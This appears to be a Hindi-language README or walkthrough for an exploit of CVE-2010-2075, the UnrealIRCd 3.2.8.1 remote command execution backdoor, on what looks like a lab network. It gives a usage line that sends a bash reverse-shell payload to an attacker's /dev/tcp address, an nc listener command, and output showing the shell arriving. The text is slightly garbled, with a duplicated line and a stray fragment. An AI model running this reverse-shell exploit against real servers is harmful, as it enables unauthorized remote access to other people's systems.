
CVE:2010-2075 का शोषण। यह शोषण UnrealIRCd 3.2.8.1 में दूरस्थ कमांड निष्पादन की अनुमति देता है।
CVE:2010-2075 के लिए शोषण। यह शोषण UnrealIRCd 3.2.8.1 में दूरस्थ कमांड निष्पादन की अनुमति देता है।
optparse, signal
आप निष्पादित करने के लिए एक कमांड भेज सकते हैं, लेकिन कई बार यह प्रतिक्रिया नहीं देगा, लेकिन आप बस एक रिवर्स शेल भेज सकते हैं और उसके आने की प्रतीक्षा कर सकते हैं।
python3 CVE-2010-2075.py -t 10.0.2.119 -p 6667 -c 'bash -c "bash -i >& /dev/tcp/10.0.2.48/443 0>&1"'
कनेक्शन बनाना
पेलोड बनाना
[*]पेलोड भेज रहा है...
और मुझे शेल प्राप्त हुआ
nc -nlvp 443
[any] 443 पर सुन रहा है ...
[10.0.2.48] से (अज्ञात) [10.0.2.119] 56916 से कनेक्ट
bash: टर्मिनल प्रक्रिया समूह (415) सेट नहीं कर सकता: डिवाइस के लिए अनुपयुक्त ioctl
bash: इस शेल में कोई जॉब नियंत्रण नहीं
server@real:~/irc/Unreal3.2$